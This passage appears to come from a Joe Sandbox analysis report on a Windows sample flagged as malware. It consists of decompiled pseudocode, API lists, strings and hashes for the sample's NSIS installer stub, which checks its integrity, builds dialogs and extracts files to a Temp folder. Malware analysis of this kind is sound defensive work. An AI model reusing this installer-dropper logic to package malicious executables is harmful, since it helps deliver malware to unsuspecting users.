                                                                            					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                            						L15:
                                                                            						E0040653D(_t86, E00405E0C(_t76));
                                                                            						goto L16;
                                                                            					} else {
                                                                            						_t69 = GetFileAttributesW(_t76);
                                                                            						if(_t69 == 0xffffffff) {
                                                                            							L14:
                                                                            							E00405E58(_t76);
                                                                            							goto L15;
                                                                            						}
                                                                            						_t98 = _t69 & 0x00000010;
                                                                            						if((_t69 & 0x00000010) != 0) {
                                                                            							goto L15;
                                                                            						}
                                                                            						goto L14;
                                                                            					}
                                                                            				}
                                                                            			}

























                                                                            APIs
                                                                              • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                              • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                            • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76FA3420), ref: 00403CED
                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                            • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54
                                                                              • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                            • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                            • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                            • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                            • API String ID: 1975747703-1862882193
                                                                            • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                            • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                            • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                            • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph (function 0040307D; nodes marked Executed / Not Executed): calls GetTickCount, GetModuleFileNameW, GetFileSize, GlobalAlloc, SetFilePointer
                                                                            C-Code - Quality: 80%
                                                                            			E0040307D(void* __eflags, signed int _a4) {
                                                                            				DWORD* _v8;
                                                                            				DWORD* _v12;
                                                                            				void* _v16;
                                                                            				intOrPtr _v20;
                                                                            				char _v24;
                                                                            				intOrPtr _v28;
                                                                            				intOrPtr _v32;
                                                                            				intOrPtr _v36;
                                                                            				intOrPtr _v40;
                                                                            				signed int _v44;
                                                                            				long _t43;
                                                                            				signed int _t50;
                                                                            				void* _t53;
                                                                            				void* _t57;
                                                                            				intOrPtr* _t59;
                                                                            				long _t60;
                                                                            				signed int _t65;
                                                                            				signed int _t70;
                                                                            				signed int _t71;
                                                                            				signed int _t77;
                                                                            				intOrPtr _t80;
                                                                            				long _t82;
                                                                            				signed int _t85;
                                                                            				signed int _t87;
                                                                            				void* _t89;
                                                                            				signed int _t90;
                                                                            				signed int _t93;
                                                                            				void* _t94;
                                                                            
                                                                            				_t82 = 0;
                                                                            				_v12 = 0;
                                                                            				_v8 = 0;
                                                                            				_t43 = GetTickCount();
                                                                            				_t91 = L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe";
                                                                            				 *0x434f0c = _t43 + 0x3e8;
                                                                            				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe", 0x400);
                                                                            				_t89 = E0040602D(_t91, 0x80000000, 3);
                                                                            				_v16 = _t89;
                                                                            				 *0x40a018 = _t89;
                                                                            				if(_t89 == 0xffffffff) {
                                                                            					return L"Error launching installer";
                                                                            				}
                                                                            				_t92 = L"C:\\Users\\Arthur\\Desktop";
                                                                            				E0040653D(L"C:\\Users\\Arthur\\Desktop", _t91);
                                                                            				E0040653D(0x444000, E00405E58(_t92));
                                                                            				_t50 = GetFileSize(_t89, 0);
                                                                            				__eflags = _t50;
                                                                            				 *0x42aa24 = _t50;
                                                                            				_t93 = _t50;
                                                                            				if(_t50 <= 0) {
                                                                            					L24:
                                                                            					E00403019(1);
                                                                            					__eflags =  *0x434f14 - _t82;
                                                                            					if( *0x434f14 == _t82) {
                                                                            						goto L29;
                                                                            					}
                                                                            					__eflags = _v8 - _t82;
                                                                            					if(_v8 == _t82) {
                                                                            						L28:
                                                                            						_t34 =  &_v24; // 0x40387d
                                                                            						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                                                            						_t94 = _t53;
                                                                            						E004034E5( *0x434f14 + 0x1c);
                                                                            						_t35 =  &_v24; // 0x40387d
                                                                            						_push( *_t35);
                                                                            						_push(_t94);
                                                                            						_push(_t82);
                                                                            						_push(0xffffffff); // executed
                                                                            						_t57 = E004032B4(); // executed
                                                                            						__eflags = _t57 - _v24;
                                                                            						if(_t57 == _v24) {
                                                                            							__eflags = _v44 & 0x00000001;
                                                                            							 *0x434f10 = _t94;
                                                                            							 *0x434f18 =  *_t94;
                                                                            							if((_v44 & 0x00000001) != 0) {
                                                                            								 *0x434f1c =  *0x434f1c + 1;
                                                                            								__eflags =  *0x434f1c;
                                                                            							}
                                                                            							_t40 = _t94 + 0x44; // 0x44
                                                                            							_t59 = _t40;
                                                                            							_t85 = 8;
                                                                            							do {
                                                                            								_t59 = _t59 - 8;
                                                                            								 *_t59 =  *_t59 + _t94;
                                                                            								_t85 = _t85 - 1;
                                                                            								__eflags = _t85;
                                                                            							} while (_t85 != 0);
                                                                            							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                            							 *(_t94 + 0x3c) = _t60;
                                                                            							E00405FE8(0x434f20, _t94 + 4, 0x40);
                                                                            							__eflags = 0;
                                                                            							return 0;
                                                                            						}
                                                                            						goto L29;
                                                                            					}
                                                                            					E004034E5( *0x41ea18);
                                                                            					_t65 = E004034CF( &_a4, 4);
                                                                            					__eflags = _t65;
                                                                            					if(_t65 == 0) {
                                                                            						goto L29;
                                                                            					}
                                                                            					__eflags = _v12 - _a4;
                                                                            					if(_v12 != _a4) {
                                                                            						goto L29;
                                                                            					}
                                                                            					goto L28;
                                                                            				} else {
                                                                            					do {
                                                                            						_t90 = _t93;
                                                                            						asm("sbb eax, eax");
                                                                            						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                                                                            						__eflags = _t93 - _t70;
                                                                            						if(_t93 >= _t70) {
                                                                            							_t90 = _t70;
                                                                            						}
                                                                            						_t71 = E004034CF(0x416a18, _t90);
                                                                            						__eflags = _t71;
                                                                            						if(_t71 == 0) {
                                                                            							E00403019(1);
                                                                            							L29:
                                                                            							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                            						}
                                                                            						__eflags =  *0x434f14;
                                                                            						if( *0x434f14 != 0) {
                                                                            							__eflags = _a4 & 0x00000002;
                                                                            							if((_a4 & 0x00000002) == 0) {
                                                                            								E00403019(0);
                                                                            							}
                                                                            							goto L20;
                                                                            						}
                                                                            						E00405FE8( &_v44, 0x416a18, 0x1c);
                                                                            						_t77 = _v44;
                                                                            						__eflags = _t77 & 0xfffffff0;
                                                                            						if((_t77 & 0xfffffff0) != 0) {
                                                                            							goto L20;
                                                                            						}
                                                                            						__eflags = _v40 - 0xdeadbeef;
                                                                            						if(_v40 != 0xdeadbeef) {
                                                                            							goto L20;
                                                                            						}
                                                                            						__eflags = _v28 - 0x74736e49;
                                                                            						if(_v28 != 0x74736e49) {
                                                                            							goto L20;
                                                                            						}
                                                                            						__eflags = _v32 - 0x74666f73;
                                                                            						if(_v32 != 0x74666f73) {
                                                                            							goto L20;
                                                                            						}
                                                                            						__eflags = _v36 - 0x6c6c754e;
                                                                            						if(_v36 != 0x6c6c754e) {
                                                                            							goto L20;
                                                                            						}
                                                                            						_a4 = _a4 | _t77;
                                                                            						_t87 =  *0x41ea18; // 0xe2df4
                                                                            						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                                                            						_t80 = _v20;
                                                                            						__eflags = _t80 - _t93;
                                                                            						 *0x434f14 = _t87;
                                                                            						if(_t80 > _t93) {
                                                                            							goto L29;
                                                                            						}
                                                                            						__eflags = _a4 & 0x00000008;
                                                                            						if((_a4 & 0x00000008) != 0) {
                                                                            							L16:
                                                                            							_v8 = _v8 + 1;
                                                                            							_t93 = _t80 - 4;
                                                                            							__eflags = _t90 - _t93;
                                                                            							if(_t90 > _t93) {
                                                                            								_t90 = _t93;
                                                                            							}
                                                                            							goto L20;
                                                                            						}
                                                                            						__eflags = _a4 & 0x00000004;
                                                                            						if((_a4 & 0x00000004) != 0) {
                                                                            							break;
                                                                            						}
                                                                            						goto L16;
                                                                            						L20:
                                                                            						__eflags = _t93 -  *0x42aa24; // 0xe2df8
                                                                            						if(__eflags < 0) {
                                                                            							_v12 = E004069F7(_v12, 0x416a18, _t90);
                                                                            						}
                                                                            						 *0x41ea18 =  *0x41ea18 + _t90;
                                                                            						_t93 = _t93 - _t90;
                                                                            						__eflags = _t93;
                                                                            					} while (_t93 != 0);
                                                                            					_t82 = 0;
                                                                            					__eflags = 0;
                                                                            					goto L24;
                                                                            				}
                                                                            			}
































                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 0040308E
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                              • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                              • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                            • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                            • API String ID: 2803837635-1574639830
                                                                            • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                            • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                            • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                            • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 506 4032b4-4032cb 507 4032d4-4032dd 506->507 508 4032cd 506->508 509 4032e6-4032eb 507->509 510 4032df 507->510 508->507 511 4032fb-403308 call 4034cf 509->511 512 4032ed-4032f6 call 4034e5 509->512 510->509 516 4034bd 511->516 517 40330e-403312 511->517 512->511 518 4034bf-4034c0 516->518 519 403468-40346a 517->519 520 403318-403361 GetTickCount 517->520 523 4034c8-4034cc 518->523 521 4034aa-4034ad 519->521 522 40346c-40346f 519->522 524 4034c5 520->524 525 403367-40336f 520->525 526 4034b2-4034bb call 4034cf 521->526 527 4034af 521->527 522->524 528 403471 522->528 524->523 529 403371 525->529 530 403374-403382 call 4034cf 525->530 526->516 538 4034c2 526->538 527->526 532 403474-40347a 528->532 529->530 530->516 540 403388-403391 530->540 535 40347c 532->535 536 40347e-40348c call 4034cf 532->536 535->536 536->516 543 40348e-403493 call 4060df 536->543 538->524 542 403397-4033b7 call 406a65 540->542 547 403460-403462 542->547 548 4033bd-4033d0 GetTickCount 542->548 549 403498-40349a 543->549 547->518 550 4033d2-4033da 548->550 551 40341b-40341d 548->551 552 403464-403466 549->552 553 40349c-4034a6 549->553 554 4033e2-403413 MulDiv wsprintfW call 40559f 550->554 555 4033dc-4033e0 550->555 556 403454-403458 551->556 557 40341f-403423 551->557 552->518 553->532 558 4034a8 553->558 563 403418 554->563 555->551 555->554 556->525 559 40345e 556->559 561 403425-40342c call 4060df 557->561 562 40343a-403445 557->562 558->524 559->524 566 403431-403433 561->566 565 403448-40344c 562->565 563->551 565->542 567 403452 565->567 566->552 568 403435-403438 566->568 567->524 568->565
                                                                            C-Code - Quality: 95%
                                                                            			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                                            				signed int _v8;
                                                                            				int _v12;
                                                                            				intOrPtr _v16;
                                                                            				long _v20;
                                                                            				intOrPtr _v24;
                                                                            				short _v152;
                                                                            				void* _t65;
                                                                            				void* _t69;
                                                                            				long _t70;
                                                                            				intOrPtr _t75;
                                                                            				long _t76;
                                                                            				intOrPtr _t77;
                                                                            				void* _t78;
                                                                            				int _t88;
                                                                            				intOrPtr _t92;
                                                                            				intOrPtr _t95;
                                                                            				long _t96;
                                                                            				signed int _t97;
                                                                            				int _t98;
                                                                            				int _t99;
                                                                            				intOrPtr _t100;
                                                                            				void* _t101;
                                                                            				void* _t102;
                                                                            
                                                                            				_t97 = _a16;
                                                                            				_t92 = _a12;
                                                                            				_v12 = _t97;
                                                                            				if(_t92 == 0) {
                                                                            					_v12 = 0x8000;
                                                                            				}
                                                                            				_v8 = _v8 & 0x00000000;
                                                                            				_v16 = _t92;
                                                                            				if(_t92 == 0) {
                                                                            					_v16 = 0x422a20;
                                                                            				}
                                                                            				_t62 = _a4;
                                                                            				if(_a4 >= 0) {
                                                                            					E004034E5( *0x434f58 + _t62);
                                                                            				}
                                                                            				if(E004034CF( &_a16, 4) == 0) {
                                                                            					L41:
                                                                            					_push(0xfffffffd);
                                                                            					goto L42;
                                                                            				} else {
                                                                            					if((_a19 & 0x00000080) == 0) {
                                                                            						if(_t92 != 0) {
                                                                            							if(_a16 < _t97) {
                                                                            								_t97 = _a16;
                                                                            							}
                                                                            							if(E004034CF(_t92, _t97) != 0) {
                                                                            								_v8 = _t97;
                                                                            								L44:
                                                                            								return _v8;
                                                                            							} else {
                                                                            								goto L41;
                                                                            							}
                                                                            						}
                                                                            						if(_a16 <= _t92) {
                                                                            							goto L44;
                                                                            						}
                                                                            						_t88 = _v12;
                                                                            						while(1) {
                                                                            							_t98 = _a16;
                                                                            							if(_a16 >= _t88) {
                                                                            								_t98 = _t88;
                                                                            							}
                                                                            							if(E004034CF(0x41ea20, _t98) == 0) {
                                                                            								goto L41;
                                                                            							}
                                                                            							_t69 = E004060DF(_a8, 0x41ea20, _t98); // executed
                                                                            							if(_t69 == 0) {
                                                                            								L28:
                                                                            								_push(0xfffffffe);
                                                                            								L42:
                                                                            								_pop(_t65);
                                                                            								return _t65;
                                                                            							}
                                                                            							_v8 = _v8 + _t98;
                                                                            							_a16 = _a16 - _t98;
                                                                            							if(_a16 > 0) {
                                                                            								continue;
                                                                            							}
                                                                            							goto L44;
                                                                            						}
                                                                            						goto L41;
                                                                            					}
                                                                            					_t70 = GetTickCount();
                                                                            					 *0x40d384 =  *0x40d384 & 0x00000000;
                                                                            					 *0x40d380 =  *0x40d380 & 0x00000000;
                                                                            					_t14 =  &_a16;
                                                                            					 *_t14 = _a16 & 0x7fffffff;
                                                                            					_v20 = _t70;
                                                                            					 *0x40ce68 = 8;
                                                                            					 *0x416a10 = 0x40ea08;
                                                                            					 *0x416a0c = 0x40ea08;
                                                                            					 *0x416a08 = 0x416a08;
                                                                            					_a4 = _a16;
                                                                            					if( *_t14 <= 0) {
                                                                            						goto L44;
                                                                            					} else {
                                                                            						goto L9;
                                                                            					}
                                                                            					while(1) {
                                                                            						L9:
                                                                            						_t99 = 0x4000;
                                                                            						if(_a16 < 0x4000) {
                                                                            							_t99 = _a16;
                                                                            						}
                                                                            						if(E004034CF(0x41ea20, _t99) == 0) {
                                                                            							goto L41;
                                                                            						}
                                                                            						_a16 = _a16 - _t99;
                                                                            						 *0x40ce58 = 0x41ea20;
                                                                            						 *0x40ce5c = _t99;
                                                                            						while(1) {
                                                                            							_t95 = _v16;
                                                                            							 *0x40ce60 = _t95;
                                                                            							 *0x40ce64 = _v12;
                                                                            							_t75 = E00406A65(0x40ce58);
                                                                            							_v24 = _t75;
                                                                            							if(_t75 < 0) {
                                                                            								break;
                                                                            							}
                                                                            							_t100 =  *0x40ce60; // 0x425a20
                                                                            							_t101 = _t100 - _t95;
                                                                            							_t76 = GetTickCount();
                                                                            							_t96 = _t76;
                                                                            							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                                            								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                            								_t102 = _t102 + 0xc;
                                                                            								E0040559F(0,  &_v152); // executed
                                                                            								_v20 = _t96;
                                                                            							}
                                                                            							if(_t101 == 0) {
                                                                            								if(_a16 > 0) {
                                                                            									goto L9;
                                                                            								}
                                                                            								goto L44;
                                                                            							} else {
                                                                            								if(_a12 != 0) {
                                                                            									_t77 =  *0x40ce60; // 0x425a20
                                                                            									_v8 = _v8 + _t101;
                                                                            									_v12 = _v12 - _t101;
                                                                            									_v16 = _t77;
                                                                            									L23:
                                                                            									if(_v24 != 1) {
                                                                            										continue;
                                                                            									}
                                                                            									goto L44;
                                                                            								}
                                                                            								_t78 = E004060DF(_a8, _v16, _t101); // executed
                                                                            								if(_t78 == 0) {
                                                                            									goto L28;
                                                                            								}
                                                                            								_v8 = _v8 + _t101;
                                                                            								goto L23;
                                                                            							}
                                                                            						}
                                                                            						_push(0xfffffffc);
                                                                            						goto L42;
                                                                            					}
                                                                            					goto L41;
                                                                            				}
                                                                            			}



























                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CountTick$wsprintf
                                                                            • String ID: *B$ ZB$ A$ A$... %d%%$}8@
                                                                            • API String ID: 551687249-3683892814
                                                                            • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                            • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                            • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                            • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 569 40176f-401794 call 402da6 call 405e83 574 401796-40179c call 40653d 569->574 575 40179e-4017b0 call 40653d call 405e0c lstrcatW 569->575 580 4017b5-4017b6 call 4067c4 574->580 575->580 584 4017bb-4017bf 580->584 585 4017c1-4017cb call 406873 584->585 586 4017f2-4017f5 584->586 593 4017dd-4017ef 585->593 594 4017cd-4017db CompareFileTime 585->594 588 4017f7-4017f8 call 406008 586->588 589 4017fd-401819 call 40602d 586->589 588->589 596 40181b-40181e 589->596 597 40188d-4018b6 call 40559f call 4032b4 589->597 593->586 594->593 599 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 596->599 600 40186f-401879 call 40559f 596->600 611 4018b8-4018bc 597->611 612 4018be-4018ca SetFileTime 597->612 599->584 633 401864-401865 599->633 609 401882-401888 600->609 613 402c33 609->613 611->612 615 4018d0-4018db CloseHandle 611->615 612->615 619 402c35-402c39 613->619 617 4018e1-4018e4 615->617 618 402c2a-402c2d 615->618 621 4018e6-4018f7 call 40657a lstrcatW 617->621 622 4018f9-4018fc call 40657a 617->622 618->613 626 401901-402398 621->626 622->626 631 40239d-4023a2 626->631 632 402398 call 405b9d 626->632 631->619 632->631 633->609 634 401867-401868 633->634 634->600
                                                                            C-Code - Quality: 75%
                                                                            			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                            				void* __esi;
                                                                            				void* _t35;
                                                                            				void* _t43;
                                                                            				void* _t45;
                                                                            				FILETIME* _t51;
                                                                            				FILETIME* _t64;
                                                                            				void* _t66;
                                                                            				signed int _t72;
                                                                            				FILETIME* _t73;
                                                                            				FILETIME* _t77;
                                                                            				signed int _t79;
                                                                            				WCHAR* _t81;
                                                                            				void* _t83;
                                                                            				void* _t84;
                                                                            				void* _t86;
                                                                            
                                                                            				_t77 = __ebx;
                                                                            				 *(_t86 - 8) = E00402DA6(0x31);
                                                                            				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                            				_t35 = E00405E83( *(_t86 - 8));
                                                                            				_push( *(_t86 - 8));
                                                                            				_t81 = L"Call";
                                                                            				if(_t35 == 0) {
                                                                            					lstrcatW(E00405E0C(E0040653D(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Temp")), ??);
                                                                            				} else {
                                                                            					E0040653D();
                                                                            				}
                                                                            				E004067C4(_t81);
                                                                            				while(1) {
                                                                            					__eflags =  *(_t86 + 8) - 3;
                                                                            					if( *(_t86 + 8) >= 3) {
                                                                            						_t66 = E00406873(_t81);
                                                                            						_t79 = 0;
                                                                            						__eflags = _t66 - _t77;
                                                                            						if(_t66 != _t77) {
                                                                            							_t73 = _t66 + 0x14;
                                                                            							__eflags = _t73;
                                                                            							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                            						}
                                                                            						asm("sbb eax, eax");
                                                                            						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                            						__eflags = _t72;
                                                                            						 *(_t86 + 8) = _t72;
                                                                            					}
                                                                            					__eflags =  *(_t86 + 8) - _t77;
                                                                            					if( *(_t86 + 8) == _t77) {
                                                                            						E00406008(_t81);
                                                                            					}
                                                                            					__eflags =  *(_t86 + 8) - 1;
                                                                            					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                            					__eflags = _t43 - 0xffffffff;
                                                                            					 *(_t86 - 0x38) = _t43;
                                                                            					if(_t43 != 0xffffffff) {
                                                                            						break;
                                                                            					}
                                                                            					__eflags =  *(_t86 + 8) - _t77;
                                                                            					if( *(_t86 + 8) != _t77) {
                                                                            						E0040559F(0xffffffe2,  *(_t86 - 8));
                                                                            						__eflags =  *(_t86 + 8) - 2;
                                                                            						if(__eflags == 0) {
                                                                            							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                            						}
                                                                            						L31:
                                                                            						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                                                            						__eflags =  *0x434f88;
                                                                            						goto L32;
                                                                            					} else {
                                                                            						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp", _t83);
                                                                            						E0040653D(_t83, _t81);
                                                                            						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                            						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp");
                                                                            						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                                            						__eflags = _t64;
                                                                            						if(_t64 == 0) {
                                                                            							continue;
                                                                            						} else {
                                                                            							__eflags = _t64 == 1;
                                                                            							if(_t64 == 1) {
                                                                            								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                                                            								L32:
                                                                            								_t51 = 0;
                                                                            								__eflags = 0;
                                                                            							} else {
                                                                            								_push(_t81);
                                                                            								_push(0xfffffffa);
                                                                            								E0040559F();
                                                                            								L29:
                                                                            								_t51 = 0x7fffffff;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					L33:
                                                                            					return _t51;
                                                                            				}
                                                                            				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
                                                                            				 *0x434fb4 =  *0x434fb4 + 1;
                                                                            				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                            				 *0x434fb4 =  *0x434fb4 - 1;
                                                                            				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                            				_t84 = _t45;
                                                                            				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                            					L22:
                                                                            					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                            				} else {
                                                                            					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                            					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                            						goto L22;
